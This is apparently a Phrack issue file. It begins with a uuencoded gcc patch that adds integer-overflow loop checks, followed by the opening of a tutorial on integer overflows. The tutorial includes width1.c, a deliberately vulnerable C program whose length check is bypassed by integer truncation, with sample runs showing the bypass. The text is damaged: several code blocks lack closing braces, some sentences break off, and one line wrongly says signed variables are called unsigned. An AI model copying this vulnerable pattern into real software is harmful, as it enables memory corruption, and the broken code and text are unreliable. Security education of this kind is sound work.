M;W`L(`T-"[email protected]*B!E;6ET(&-O9&[email protected]=&\@[email protected];&]O<"!C;W5N=&5R(&EN
M(')U;BUT:6UE+B!T:&%T(&-O9&[email protected]=VEL;`T-"[email protected]*B!M86ME('-U<[email protected]=&AE
M(&-O=6YT97(@:7,@;F]T('1O;R!B:6<@*&%S(')E<W5L="!O9B!I;[email protected];W9E
M<F9L;W<-#0HK("[email protected];&]I=&%T:6]N*2`J+PT-"BL-#0HK("`@#0T**W1R
M964-#0HK8FQI<%]C:&5C:U]L;V]P7VQI;6ET("AT*0T-"[email protected]("`@('[email protected]
M=#L-#0HK>PT-"BL)[email protected]&]O<"!P87)T<R`J+PT-"BL)=')E90ER97-U;'0]
M=#L-#0HK#0T**PDO*B!)9B!W92!A<[email protected];F]T(&%S:V5D('1O(&)L:7`L(')E
M='5R;B!T:&[email protected]=')E92!W92!G;[email protected]*B\-#0HK"6EF*"%F;&%G7V)L:7`I(')E
M='5R;B!R97-U;'0[#0T**PT-"BL)[email protected]@=&AE('[email protected][email protected]]T(&ES
M(&YU;&[email protected]=&AE;B!W92!C86YT(&1O(&[email protected]@*B\-#0HK"6EF*"%T*0ER971U
M<[email protected]<F5S=6QT.PT-"BL-#0HK"2\J(&EN:71I86QI>[email protected];&]O<%]L:6UI="!G
M;&][email protected]*B\-#0HK"6QO;W!?;&EM:70N<W1M="`]('0[#0T**PEL;V]P7VQI
M"0T-"BL)#0T**[email protected]%)%15]#3T1%("AT*2E[#0T**PD-#0HK"2\J
M(&1E<&5N9&EN9R!O9B!L;V]P('1Y<&4L(&5X=')[email protected]=&AE(&QO;W`@<W1M
M=',@86YD(&5X<')S#0T**[email protected]*B!L;V]P(&-O;F1I=&EO;B!W:6QL(&AE;'`@
M=7,@:61E;[email protected]=&AE(&QO;W`@8V]U;G1E<B!V87(-#0HK"2`J('=E('=I
M;&[email protected];&%T97(@;&]O:R!I;B!C;VYD(&ET<V5L9B!A;[email protected]=&AE(&9O<E]E>'!R
M;[email protected]#0T**[email protected]*@T-"BL)("[email protected]:[email protected];6]D:69I8V%T:6]N(&9O=6YD(&%N9"!L
M;V]K(&QI:[email protected]`B8V]U;G0B(&UO9&EF:6-A=&EO;B`-#0HK"2`J("AI+F4N
M("LK+"TM+"L]+"H][email protected]*2!W92!W:6QL(&MN;W<@:71S(&[email protected](F-O=6YT
M(B!L;V][email protected]"BL)("[email protected]"0T-"BL)("[email protected];F5X="!S=&5P+"!I<R!T;R!I9&5N
M=&EF>2!C;VYD:71I;[email protected]<F5S:6]N+B!A;[email protected]=&\@96UI=`T-"BL)("[email protected]
M8V]D92!T;R!C:&5C:R!L:6UI="!I;B!R=6YT:6UE+"!B969O<[email protected];&]O<"!S
M=&%R="!E>&5U8W1I;[email protected]("HO#0T**PT-"BL)8V%S92!&3U)?4U1-5#H-#0HK
M"0D)?0T-"BL-#0HK"0EB<F5A:SL-#0HK"6-A<[email protected])3$5?4U1-5#H-#0HK
M*%=(24Q%7T-/[email protected]*'0I+$Y53$Q?5%)%12DI#0T**PD)"6EF*&)L:7!?96UI
M=%]W:&EL95]L;V]P7V-H96-K<[email protected]*7L-#0HK"0D)"6)L:7!?<W1A="YT;W1A
M04Y$("AT+#$I*2D-#0HK"0D)<F5S=6QT(#[email protected]<%]E;6ET7V-A;&Q?8VAE
M#0T**PD)<F5T=7)N(')E<W5L=#L-#0HK"7T-#0HK#0T**PER971U<[email protected]<F5S
M(&=C8RTS+C(M8FQI<"]G8V,O8FQI<"YH#[email protected]+3,N,B]G8V,O8FQI
M<"YH"5=E9"!$96,@,[email protected],38Z,#`Z,#`@,3DV.0T**RLK(&=C8RTS+C(M8FQI
M<"]G8V,O8FQI<"YH"4UO;B!$96,@(#(@,3DZ-#(Z,[email protected],C`P,@T*0$`@+3`L
M=&EO;B`M($$N2RY!(")B;&EP(@T**PT**PEB;&EP(&ES(&[email protected]<&%[email protected]@9F]R
M('1H92!G8V,@8V]M<&EL97(L('=H:6-H(&1E=&5C="!T:&[email protected];&]I=&%T
M:6]N#0HK"6]F("AP=6)L:6-L>[email protected]=6YK;F]W;B!I;G1E9V5R(&]V97)F;&]W
M(&%N9"!S:6=N('9U;&YE<F%B:6QI=&EE<RX-"BL-"[email protected]("`-"BM4:&ES(&9I
M;&[email protected]:7,@<&%R="!O9B!'[email protected],N#0HK#0HK1TY5($-#(&ES(&[email protected]<V]F
M='=A<F4[('[email protected]<F5D:7-T<FEB=71E(&ET(&%N9"]O<B!M;V1I9GD-
M"BMI="!U;F1E<B!T:&[email protected]=&5R;7,@;[email protected]=&AE($=.52!'96YE<F%L(%!U8FQI
M=&EO;BD-"BMA;[email protected];&%T97(@=F5R<VEO;BX-"BL-"BM'[email protected],@:7,@9&ES
M=')[email protected]:[email protected]=&AE(&AO<&[email protected]=&AA="!I="!W:6QL(&)E('5S969U;"P-
M"BL)8G5T(%=)5$A/[email protected](%=!4E)!3E19.R!W:71H;W5T(&[email protected]=&AE
M(&EM<&[email protected]=V%R<F%N='[email protected];V8-"BL)34520TA!3E1!0DE,2519(&]R($9)
M5$Y%4U,@1D]2([email protected]$%25$E#54Q!4B!055)03U-%+B`@4V5E('1H90T**PE'
[email protected])A;"!0=6)L:6,@3&EC96YS92!F;W(@;6]R92!D971A:[email protected]*
M*PT**PE9;[email protected]<VAO=6QD(&[email protected]<[email protected]!C;W!Y(&]F('1H92!'
[email protected])A;"!0=6)L:6,@3&EC96YS90T**PEA;&]N9R!W:71H($=.52!#
[email protected]<V5E('1H92!F:6QE($-/4%E)3D<N("!)9B!N;W0L('=R:71E('1O#0HK
M("`J+PT**PT**R-D969I;[email protected])4%][email protected]),'@Q,#`P,#`P,"`O*B`[email protected]
M9&5F(&[email protected];&]O<%]D:7(-"BM[#0HK"55.2TY/5TY?1$E2+"\J('=E(&-A
M;FYO="!T96QL(&QO;W`@9&ER96-T:6]N("HO#0HK"4E.0U)%345.5"P)[email protected]
M;&]O<"!I<R!G;VEN9R!U<"`J+PT**PE$14-214U%3E0)[email protected];&]O<"!I<R!G
M;VEN9R!D;W=N("HO#0HK?0T**VQO;W!?9&ER.PT**PT**W1Y<&[email protected]
M:&[email protected]%)%[email protected]"[email protected]=&AE(')I9VAT#0HK"0D)"2`@('=A
M(&-H96-K(&9O<B!F;W(@;&]O<',@*B\-"BL)3D5?5TA)3$4L"2\J('=A<[email protected]
M;F]T(&5M:71I;F<@[email protected]]R('=H:6QE(&QO;W!S("HO#0HK"4Y%7T-!
M3$P)"2\J('=A<[email protected];F]T(&5M:71I;F<@[email protected]]R(&-A;&QS("HO#0HK
M?0T**V)L:7!?=V%R;FEN9W,[#0HK#0HK='EP961E9B!S=')[email protected];W!?
M8W,@<W1R=6-T=7)E+"!W:6QL(&UA:6YT86EN('1H92!A;6]U;[email protected];[email protected]
M;W5T97)D(`T**R`J(&-O9&[email protected]=&AA="!M:6=H="!H879E(&YE961E9"!A(&)L
M:7`@8VAE8VLL(&%N9"!T:&[email protected]<F5A;"!A;6]U;[email protected];[email protected]#0HK("[email protected]=&EM97,@
M=&AA="!A(&)L:7`@[email protected]=V%S(&5M:71E9"[email protected]*B\-"BMT>7!E9&5F('-T
M7W-T871I<W1I8W-?<SL-"BL-"BLO*B!.54Q,('1E<FUI;F%[email protected];&ES="!O
M9B!F=6YC=&EO;B!W:&EC:"!A<[email protected];W-T('1H92!S86UE(&%S(&[email protected]#0HK
M("[email protected];&]O<"[email protected]:2YE(&UE;6-P>[email protected];65M;6]V92XN(&9O<B!E86-H(&9U;F-T
M:6]N('=E('=I;&[email protected]<V%V92!T:&[email protected]#0HK("[email protected];F%M92!O9B!T:&[email protected]
M;[email protected],@=V5L;"!A<R!T:&[email protected],"!B87-E9"!I;F1E>"!T;R!T:&[email protected]<&%[email protected]
M#0HK("[email protected][email protected]@:7,@<W5P<&]S92!T;R!H879E('1H92!L96YG=&@@=F%R
M:6%B;&[email protected]*B\-"BL-"BMT>7!E9&5F('-T<G5C="!?;&]O<%]L:6ME7W-[#0HK
M"6-H87()"0EF=6YC7VYA;65;,C4V73L-"BL)=6YS:[email protected]:6YT"7!A<F%M
M7V1E8VQ?;6]D:[email protected]("`@("`@("!005)!35,@*"AT<F5E+'1R964I*3L-
M4R`H*'1R964L=')E92DI.PT**V)O;[email protected]<%]F:6YD7V-A;&Q?;&EM:71S
M;[email protected]<%]E;6ET7W=H:6QE7VQO;W!?8VAE8VMS("`@(%!!4D%-4R`H*'9O
M;[email protected]("`@("!005)!35,@*"AT<F5E*2D[#0HK=')E92!B;&EP7V)U:6QD7V-H
M9W,L8V]N<[email protected]<BHI*3L-"[email protected]+4YU<B!G8V,M,RXR+V=C8R]C+6]B
M,#HT.3HU."`R,#`R#0HK*[email protected]+3,N,BUB;&EP+V=C8R]C+6]B:F,M8V]M
M.2!`0`T*("`@:[email protected]*&QO;VMU<%]A='1R:6)U=&[email protected]*")A;'=A>7-?:6YL:6YE
M([email protected]$5#3%]!5%1224)55$53("AF;BDI("$]($Y53$PI#[email protected]("`@(')E='5R
M;B`Q.PT*(`T**R`@:68H1$5#3%],04Y'7U-014-)1DE#("AF;[email protected]/[email protected],
M3"[email protected]#0HK"2`@<F5T=7)N(#`[#0HK("`-"B`@(')E='5R;B!$14-,7T1%0TQ!
M4D5$7TE.3$E.15]0("AF;[email protected])[email protected]$5#3%]%6%1%4DY!3"`H9FXI.PT*('T-
M"B`-"[email protected]+4YU<B!G8V,M,RXR+V=C8R]C+7!A<[email protected]+3,N,BUB
M5V5D($%U9R`Q-"`P,CHS,CHS-2`R,#`R#0HK*[email protected]+3,N,BUB;&EP+V=C
M=&]P;&[email protected]#[email protected](VEN8VQU9&[email protected](F=G8RYH(@T**R-I;F-L=61E(")B;&EP
[email protected]#[email protected]("`-"B`C:[email protected],5$E"651%7T-(05)3#[email protected](VEN8VQU9&[email protected]
M("`@("`@("![("0T(#[email protected]=')U=&AV86QU95]C;VYV97)S:6]N("@D-"D[#[email protected]
M"[email protected](&-?9FEN:7-H7W=H:6QE7W-T;71?8V]N9"`H=')U=&AV86QU95]C;VYV
M97)S:6]N("@D-"DL#[email protected]"0D)"[email protected]("`@)#QT='EP93XR*3L-"BL)"0EB;&EP
M7V-H96-K7VQO;W!?;&EM:[email protected]*"0\='1Y<&4^,BD[#[email protected]"[email protected]("0\='1Y<&4^
M)"`](&%D9%]S=&UT("@D/'1T>7!E/C(I.R!]#[email protected]"2`@8SDY7V)L;V-K7VQI
M;F5N;U]L86)E;&5D7W-T;70-"BT)"[email protected]#2$%)3E]35$U44R`H)#QT='EP
M93XV+"!72$E,15]"3T19("@D/'1T>7!E/C8I*[email protected]?0T**PD)>R!214-(04E.
M7U-43513("@D/'1T>7!E/C8L(%=(24Q%7T)/1%[email protected]*"0\='1Y<&4^-BDI.WT-
M"B`)?"!D;U]S=&UT7W-T87)T#[email protected]"2`@)[email protected](&5X<'(@)RDG("<[)PT*("`@
M("`@("`@("`@("`@("![($1/7T-/[email protected]*"0Q*2`]('1R=71H=F%L=65?8V]N
M97AP<B`G*2<-"B`)"[email protected]]27T584%(@*"0\='1Y<&4^,[email protected]/2`[email protected]?0T*
M(`[email protected](&,Y.5]B;&]C:U]L:6YE;F]?;&%B96QE9%]S=&UT#0HM("`@("`@("`@
M("`@("`@('[email protected]#2$%)3E]35$U44R`H)#QT='EP93XR+"!&3U)?0D]$62`H
M)#QT='EP93XR*2D[('T-"[email protected]("`@("`@("`@("`@("`@>R!214-(04E.7U-4
M("!B;&EP7V-H96-K7VQO;W!?;&EM:[email protected]*"0\='1Y<&4^,BD[('T-"B`)?"!3
[email protected]@)[email protected](&5X<'(@)RDG#[email protected]"0E[('-T;71?8V]U;G0K*SL-"B`)"2`@
M)#QT='EP93XD(#[email protected]]S=&%R=%]C87-E("@D,RD[('T-"[email protected]+4YU<B!G
M-SHU,SHS.2`R,#`R#0HK*[email protected]+3,N,BUB;&EP+V=C8R]C+71Y<&5C:RYC
M"4UO;B!$96,@(#(@,3DZ-#(Z,[email protected],C`P,@T*0$`@+30R+#[email protected]*S0R+#<@0$`-
M;'5D92`B=&%[email protected]#0HK(VEN8VQU9&[email protected](F)L:7`N:"(-"B`-"B`O*B!.
M;VYZ97)O(&EF('=E)W9E(&%L<F5A9'[email protected]<')I;G1E9"!A(")M:7-S:6YG(&)R
M86-E<R!A<F]U;[email protected]:6YI=&EA;&EZ97(B#[email protected]("`@;65S<V%G92!W:71H:[email protected]
M=&AI<R!I;FET:6%L:7IE<[email protected]("HO#0I`0"`M,34X-RPV("[email protected]+#$Q($!`
M#[email protected]("!44D5%7U-)1$5?149&14-44R`H<F5S=6QT*2`](#$[#[email protected]("!R97-U
M;'[email protected]/2!F;VQD("AR97-U;'0I.PT*(`T**R`@[email protected]@=&AE(&YE=R!C
M<F5A=&5D($-!3$Q?15A04B!F;W(@8FQI<"!C;VYD:71I;VXN(`T**R`@("[email protected]
M:[email protected]@8V]D92!R97%U:7)E9"[email protected]=&AE($-!3$Q?15A04B!W:6QL(&)E
M(')E<&QA8V5D('=I=&@@80T**R`@("[email protected]].1%]%6%!2(&AA=FEN9R!T:&[email protected]
M0T%,3%]%6%!2(&]N(&ET<R!F86QS92!S:61E+B`J+PT**R`@<F5S=6QT(#[email protected]
M8FQI<%]C:&5C:U]L;V]P7VQI;6ET*')E<W5L="D[#0HK#[email protected]("!I9B`H5D])
M1%]465!%7U`@*%12145?5%E012`H<F5S=6QT*2DI#[email protected]("`@(')E='5R;B!R
M97-U;'0[#[email protected]("!R971U<[email protected]<F5Q=6ER95]C;VUP;&5T95]T>7!E("AR97-U
M;'0I.PT*9&EF9B`M3G5R(&=C8RTS+C([email protected]@9V-C+3,N,BUB
M;&EP+V=C8R]F;&%G<RYH#[email protected]+3,N,B]G8V,O9FQA9W,N:`E4:'[email protected]
[email protected])36]N($1E8R`@,B`Q.3HT,CHS.2`R,#`R#0I`0"`M-C0Q+#[email protected]*S8T
M(&5X8V5P=&EO;G,@9F]R(&YO;BUC86QL(&EN<W1R=6-T:6]N<[email protected]("HO#[email protected]
M97AT97)N(&EN="!F;&%G7VYO;E]C86QL7V5X8V5P=&EO;G,[#[email protected]#[email protected]
M:7,@96YA8FQE9"[email protected]*B\-"BME>'1E<[email protected]:6YT(&9L86=?8FQI<%]S=&%T.PT*
M;V]P<R!A;[email protected];&]O<"UL:6ME(&-A;&QS("HO#0HK97AT97)N(&EN="!F;&%G
M7V)L:7`[#0HK#[email protected]%R;B!W:&5N(&9O<B!B;&EP(&-H96-K(&-O=6QD
M>'1E<[email protected]:6YT('=A<FY?8FQI<%]F;W)?;F]T7V5M:70[#0HK#[email protected]%R
M;B!W:&5N('=H:6QE(&)L:7`@[email protected]]U;&[email protected];F]T(&)E(&5M:71E9"[email protected]
M("U78FQI<%]W:&EL95]N;W1?96UI="[email protected]("HO#0HK97AT97)N(&EN="!W87)N
M7V)L:7!?=VAI;&5?;F]T7V5M:70[#0HK#[email protected]%R;B!W:&5N(&1O(&)L
M:7`@[email protected]]U;&[email protected];F]T(&)E(&5M:71E9"[email protected]("U78FQI<%]C86QL7VYO
M=%]E;6ET+B`@*B\-"BME>'1E<[email protected]:6YT('=A<FY?8FQI<%]C86QL7VYO=%]E
M=F5R"5=E9"!*[email protected],3,@,#<Z,C8Z,#[email protected],C`P,0T**RLK(&=C8RTS+C(M8FQI
M#0I`0"`M,3<T+#[email protected]*S$W-"PW($!`#[email protected]("!?56YW:6YD7U-J3&I?4F%I<V5%
M;G=I;F1?4VI,:E]297-U;64-"BL-"[email protected](",@0FEG($QO;W`@26YT96=E<B!0
M#[email protected]?0T*9&EF9B`M3G5R(&=C8RTS+C(O9V-C+VQI8F=C8S(N8R!G8V,M,RXR
[email protected]%Y(#(Q(#$V.C0T.C,X(#(P,#(-"BLK*R!G8V,M,RXR+6)L:7`O
M9V-C+VQI8F=C8S(N8PE-;[email protected]&5C("`R(#$Y.C0R.C,Y(#(P,#(-"D!`("TR
M,#0Y+#,@*S(P-#DL,[email protected]$`-"B`C96YD:[email protected][email protected]%1%][email protected]*B\-
M"B`-"B`C96YD:[email protected][email protected]%]E>&ET("HO#0HK#0HK(VEF9&5F($Q?8FQI<%]V
M:6]L871I;VX-"BMV;VED(%]?8FQI<%]V:6]L871I;[email protected]*'5N<VEG;F5D(&EN
M="!L:6UI="E[#0HK"0T**PEP<FEN=&8H(F)L:7`@=FEO;&%T:6]N("$A([email protected]
M*PEA8F]R="@I.PT**WT-"BLC96YD:68-"[email protected]+4YU<B!G8V,M,RXR+V=C
M8R]L:6)G8V,[email protected]@9V-C+3,N,BUB;&EP+V=C8R]L:6)G8V,[email protected]"BTM+2!G
M8V,M,RXR+V=C8R]L:6)G8V,[email protected])5V5D($%U9R`R,B`P-SHS-3HR,B`R,#`Q
M#0HK*[email protected]+3,N,BUB;&EP+V=C8R]L:6)G8V,[email protected])36]N($1E8R`@,B`Q
M.3HT,CHS.2`R,#`R#0I`0"`M,C(L-B`K,C(L-R!`0`T*("[email protected]#
M7TQ)0D=#0S)?2`T*("-D969I;[email protected]#7TQ)0D=#0S)?2`T*(`T**V5X=&5R
M;B!V;VED(%]?8FQI<%]V:6]L871I;[email protected]*'5N<VEG;F5D(&EN="!L:6UI="D[
M#[email protected])N(&EN="!?7V=C8U]B8VUP("AC;VYS="!U;G-I9VYE9"!C:&%R
M("HL(&-O;G-T('5N<VEG;F5D(&-H87(@*[email protected]<VEZ95]T*3L-"B!E>'1E<[email protected]
M=F]I9"!?7V-L96%R7V-A8VAE("AC:&%R("HL(&-H87(@*BD[#[email protected])N
M('9O:[email protected]]E<')I;G1F("AC;VYS="!C:&%R("HL(&-O;G-T(&-H87(@*[email protected]
M=6YS:[email protected]:6YT+"!C;VYS="!C:&%R("HI#0ID:69F("U.=7(@9V-C+3,N
M(&=C8RTS+C(O9V-C+W1O<&QE=BYC"5-U;[email protected],[email protected],C(Z-#@Z,[email protected],C`P
M9VAO;[email protected]#0HK(VEN8VQU9&[email protected](F)L:7`N:"(-"B`-"B`C:[email protected]&5F:6YE
M54='24Y'7TE.1D\I#[email protected](VEN8VQU9&[email protected](F1W87)F,F]U="YH(@T*0$`@+3DR
M+#[email protected]*SDS+#@@0$`-"B`C:6YC;'5D92`B:&%L9G!I8RYH(@T*("-E;[email protected]*
M05)%7T]"2D5#5%].04U%#[email protected]("`@=&\@05--7T9)3DE32%]$14-,05)%7T]"
M2D5#5"[email protected]("HO#[email protected]#0I`0"`M.#8W+#[email protected]*[email protected],"PX($!`#[email protected]("`@1F]R(&5A
[email protected]@=F%R:6%B;&4L('1H97)E(&ES(&%N(%]L;V<@=F%R:6%N="!W:&EC:"!I
M<R!T:&[email protected]<&]W97(-"B`@("!O9B!T=V\@;F]T(&QE<W,@=&AA;B!T:&[email protected]=F%R
M:6%B;&4L(&9O<B`[email protected];W5T<'5T+B`@*B\-"B`-"BL-"BL-"B!I;[email protected]
M86QI9VY?;&]O<',[#[email protected]:6YT(&%L:6=N7VQO;W!S7VQO9SL-"B!I;[email protected]
M9VY?;&]O<'-?;6%X7W-K:7`[#0I`0"`M.#<Y+#[email protected]*[email protected]"PQ-B!`0`T*(&EN
M="!A;&EG;E]F=6YC=&EO;G,[#[email protected]:6YT(&%L:6=N7V9U;F-T:6]N<U]L;V<[
M#[email protected]#[email protected]@;VYE(&5M:[email protected]<"!C:&5C:W,@=&\@<')O=&5C="!F
M<F]M('-O;[email protected]:6YT96=E<B!V=6QN97)A8FEL:71I97,-"[email protected]*B!E>'!L;VET
M:[email protected]/2`P.PT**VEN="!W87)N7V)L:7!?=VAI;&5?;F]T7V5M:[email protected]/2`P.PT*
M*VEN="!W87)N7V)L:7!?8V%L;%]N;W1?96UI="`](#`[#0HK#[email protected][email protected]&%B
M;&[email protected];[email protected]<W5P<&]R=&5D(&1E8G5G9VEN9R!F;W)M871S+B`@*B\-"B!S=&%T
M:6,@8V]N<[email protected]<W1R=6-T#[email protected]>PT*0$`@+3$Q-3`L-B`K,3$V-2PQ,"!`0`T*
M("`@($Y?*")297!O<[email protected];[email protected]<&5R;6%N96YT(&UE;6]R>2!A;&QO8V%T:6]N
[email protected],2P-"B`@("[email protected]')A<"!F;W(@<VEG;F5D(&]V97)F;&]W(&EN(&%D
M9&ET:6]N("\@<W5B=')A8W1I;[email protected]+R!M=6QT:7!L:6-A=&EO;B(I('TL#0HK
M("![(")B;&EP([email protected])F9L86=?8FQI<"[email protected],2P-"[email protected]("[email protected]="!":6<@
M3&]O<"!);G1E9V5R(%!R;W1E8W1I;[email protected]*&)L:7`I(&-H96-K<R(I('TL#0HK
M(E)E<&]R="!B;&EP('-T871I<W1I8W,B*2!]+`T*('T[#[email protected]#[email protected][email protected]&%B
M;&[email protected];[email protected];&%N9W5A9V4M<W!E8VEF:6,@;W!T:6]N<[email protected]("HO#0I`0"`M,30Y
M,2PW("LQ-3$P+#$S($!`#[email protected]("![(F1E<')E8V%T960M9&5C;&%R871I;VYS
M([email protected])G=A<FY?9&5P<F5C871E9%]D96-L+"`Q+`T*("`@($Y?*")787)N(&%B
M;W5T('5S97,@;[email protected]]A='1R:6)U=&[email protected]&5P<F5C871E9"DI(&1E8VQA
M<F%T:6]N<R(I('TL#[email protected]("![(FUI<W-I;F<M;F]R971U<FXB+"`F=V%R;E]M
M:6]N<R!W:&EC:"!M:6=H="!B92!C86YD:61A=&5S(&9O<B!A='1R:6)U=&[email protected]
M;F]R971U<FXB*2!]#0HK("`@3E\H(E=A<[email protected])[email protected];VYS('=H
M;B(I('TL#0HK("![(F)L:7!?9F]R7VYO=%]E;6ET([email protected])G=A<FY?8FQI<%]F
M;W)?;F]T7V5M:70L(#$L#0HK("`@3E\H(E=A<[email protected]=VAE;B!B;&EP(&-H96-K
M;&EP7W=H:6QE7VYO=%]E;6ET([email protected])G=A<FY?8FQI<%]W:&EL95]N;W1?96UI
M="[email protected],2P-"[email protected]("[email protected]%R;B!W:&5N(&)L:7`@[email protected];[email protected]=VAI;&[email protected]
M;&]O<"!C;W5L9"!N;[email protected]@96UI=&5D([email protected]?2P-"[email protected]('LB8FQI<%]C86QL
M7VYO=%]E;6ET([email protected])G=A<FY?8FQI<%]C86QL7VYO=%]E;6ET+"`Q+`T**R`@
M($Y?*")787)N('[email protected]<"!C:&5C:R!O9B!C86QL<R!C;W5L9"!N;[email protected]
[email protected]=&5D([email protected]?0T*('T[#[email protected]#[email protected]=F]I9`T*0$`@+34R,34L-B`K-3(T
M,"PY($!`#[email protected]("`O*B!3=&]P('1I;6EN9R!A;[email protected]<')I;[email protected]=&AE('1I;65S
M<E]P<FEN="`H<W1D97)R*3L-"BL-"[email protected]("\J(%!R:6YT(&)L:7`@<W1A=&ES
M=&EC<R`J+PT**R`@8FQI<%]S=&%T7W!R:6YT*'-T9&5R<BD[#[email protected]?0T*(`P-
M"B`O*B!%;G1R>2!P;VEN="!O9B!C8S$L(&-C,7!L=7,L(&IC,[email protected]<W,[email protected]
&[email protected]*

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x0a of 0x10

|=--------------------=[ Basic Integer Overflows ]=----------------------=|
|=-------------------=[ by blexim <[email protected]> ]=-------------------=|

1: Introduction
    1.1 What is an integer?
    1.2 What is an integer overflow?
    1.3 Why can they be dangerous?

2: Integer overflows
    2.1 Widthness overflows
        2.1.1 Exploiting
    2.2 Arithmetic overflows
        2.2.1 Exploiting

3: Signedness bugs
    3.1 What do they look like?
        3.1.1 Exploiting
    3.2 Signedness bugs caused by integer overflows

4: Real world examples
    4.1 Integer overflows
    4.2 Signedness bugs

--[ 1.0 Introduction

In this paper I'm going to describe two classes of programming bugs which
can sometimes allow a malicious user to modify the execution path of an
affected process.  Both of these classes of bug work by causing variables
to contain unexpected values, and so are not as "direct" as classes which
overwrite memory, e.g. buffer overflows or format strings.  All the
examples given in the paper are in C, so a basic familiarity with C is
assumed.  A knowledge of how integers are stored in memory is also useful,
but not essential.

----[ 1.1 What is an integer?

An integer, in the context of computing, is a variable capable of
representing a real number with no fractional part.  Integers are typically
the same size as a pointer on the system they are compiled on (i.e. on a 32
bit system, such as i386, an integer is 32 bits long, on a 64 bit system,
such as SPARC, an integer is 64 bits long).  Some compilers don't use
integers and pointers of the same size however, so for the sake of
simplicity all the examples refer to a 32 bit system with 32 bit integers,
longs and pointers.

Integers, like all variables are just regions of memory.  When we talk
about integers, we usually represent them in decimal, as that is the
numbering system humans are most used to.  Computers, being digital, cannot
deal with decimal, so internally to the computer integers are stored in
binary.  Binary is another system of representing numbers which uses only
two numerals, 1 and 0, as opposed to the ten numerals used in decimal.  As
well as binary and decimal, hexadecimal (base sixteen) is often used in
computing as it is very easy to convert between binary and hexadecimal.

Since it is often necessary to store negative numbers, there needs to be a
mechanism to represent negative numbers using only binary.  The way this is
accomplished is by using the most significant bit (MSB) of a variable to
determine the sign: if the MSB is set to 1, the variable is interpreted as
negative; if it is set to 0, the variable is positive.  This can cause some
confusion, as will be explained in the section on signedness bugs, because
not all variables are signed, meaning they do not all use the MSB to
determine whether they are positive or negative.  These variable are known
as unsigned and can only be assigned positive values, whereas variables
which can be either positive or negative are called unsigned.

----[ 1.2 What is an integer overflow?

Since an integer is a fixed size (32 bits for the purposes of this paper),
there is a fixed maximum value it can store.  When an attempt is made to
store a value greater than this maximum value it is known as an integer
overflow.  The ISO C99 standard says that an integer overflow causes
"undefined behaviour", meaning that compilers conforming to the standard
may do anything they like from completely ignoring the overflow to aborting
the program.  Most compilers seem to ignore the overflow, resulting in an
unexpected or erroneous result being stored.

----[ 1.3 Why can they be dangerous?

Integer overflows cannot be detected after they have happened, so there is
not way for an application to tell if a result it has calculated previously
is in fact correct.  This can get dangerous if the calculation has to do
with the size of a buffer or how far into an array to index.  Of course
most integer overflows are not exploitable because memory is not being
directly overwritten, but sometimes they can lead to other classes of bugs,
frequently buffer overflows.  As well as this, integer overflows can be
difficult to spot, so even well audited code can spring surprises.

--[ 2.0 Integer overflows

So what happens when an integer overflow does happen?  ISO C99 has this to

    "A computation involving unsigned operands can never overflow,
    because a result that cannot be represented by the resulting unsigned
    integer type is reduced modulo the number that is one greater than
    the largest value that can be represented by the resulting type."

NB: modulo arithmetic involves dividing two numbers and taking the
    10 modulo 5 = 0
    11 modulo 5 = 1
so reducing a large value modulo (MAXINT + 1) can be seen as discarding the
portion of the value which cannot fit into an integer and keeping the rest.
In C, the modulo operator is a % sign.

This is a bit wordy, so maybe an example will better demonstrate the
typical "undefined behaviour":

We have two unsigned integers, a and b, both of which are 32 bits long.  We
assign to a the maximum value a 32 bit integer can hold, and to b we assign
1.  We add a and b together and store the result in a third unsigned 32 bit
integer called r:

    a = 0xffffffff
    b = 0x1
    r = a + b

Now, since the result of the addition cannot be represented using 32 bits,
the result, in accordance with the ISO standard, is reduced modulo

    r = (0xffffffff + 0x1) % 0x100000000
    r = (0x100000000) % 0x100000000 = 0

Reducing the result using modulo arithmetic basically ensures that only the
lowest 32 bits of the result are used, so integer overflows cause the
result to be truncated to a size that can be represented by the variable.
This is often called a "wrap around", as the result appears to wrap around
to 0.

----[ 2.1 Widthness overflows

So an integer overflow is the result of attempting to store a value in a
variable which is too small to hold it.  The simplest example of this can
be demonstrated by simply assigning the contents of large variable to a
smaller one:

    /* ex1.c - loss of precision */
    #include <stdio.h>

    int main(void){
            int l;
            short s;
            char c;

            l = 0xdeadbeef;
            s = l;
            c = l;

            printf("l = 0x%x (%d bits)\n", l, sizeof(l) * 8);
            printf("s = 0x%x (%d bits)\n", s, sizeof(s) * 8);
            printf("c = 0x%x (%d bits)\n", c, sizeof(c) * 8);

            return 0;
    /* EOF */

The output of which looks like this:

    nova:signed {48} ./ex1
    l = 0xdeadbeef (32 bits)
    s = 0xffffbeef (16 bits)
    c = 0xffffffef (8 bits)

Since each assignment causes the bounds of the values that can be stored in
each type to be exceeded, the value is truncated so that it can fit in the
variable it is assigned to.

It is worth mentioning integer promotion here.  When a calculation
involving operands of different sizes is performed, the smaller operand is
"promoted" to the size of the larger one.  The calculation is then
performed with these promoted sizes and, if the result is to be stored in
the smaller variable, the result is truncated to the smaller size again.
For example:

    int i;
    short s;

    s = i;

A calculation is being performed with different sized operands here.  What
happens is that the variable s is promoted to an int (32 bits long), then
the contents of i is copied into the new promoted s.  After this, the
contents of the promoted variable are "demoted" back to 16 bits in order to
be saved in s.  This demotion can cause the result to be truncated if it is
greater than the maximum value s can hold.

------[ 2.1.1 Exploiting

Integer overflows are not like most common bug classes.  They do not allow
direct overwriting of memory or direct execution flow control, but are much
more subtle.  The root of the problem lies in the fact that there is no way
for a process to check the result of a computation after it has happened,
so there may be a discrepancy between the stored result and the correct
result.  Because of this, most integer overflows are not actually
exploitable.  Even so, in certain cases it is possible to force a crucial
variable to contain an erroneous value, and this can lead to problems later
in the code.

Because of the subtlety of these bugs, there is a huge number of situations
in which they can be exploited, so I will not attempt to cover all
exploitable conditions.  Instead, I will provide examples of some
situations which are exploitable, in the hope of inspiring the reader in
their own research :)

Example 1:

    /* width1.c - exploiting a trivial widthness bug */
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[]){
            unsigned short s;
            int i;
            char buf[80];

            if(argc < 3){
                    return -1;

            i = atoi(argv[1]);
            s = i;

            if(s >= 80){            /* [w1] */
                    printf("Oh no you don't!\n");
                    return -1;

            printf("s = %d\n", s);

            memcpy(buf, argv[2], i);
            buf[i] = '\0';
            printf("%s\n", buf);

            return 0;

While a construct like this would probably never show up in real life code,
it serves well as an example.  Take a look at the following inputs:

    nova:signed {100} ./width1 5 hello
    s = 5
    nova:signed {101} ./width1 80 hello
    Oh no you don't!
    nova:signed {102} ./width1 65536 hello
    s = 0
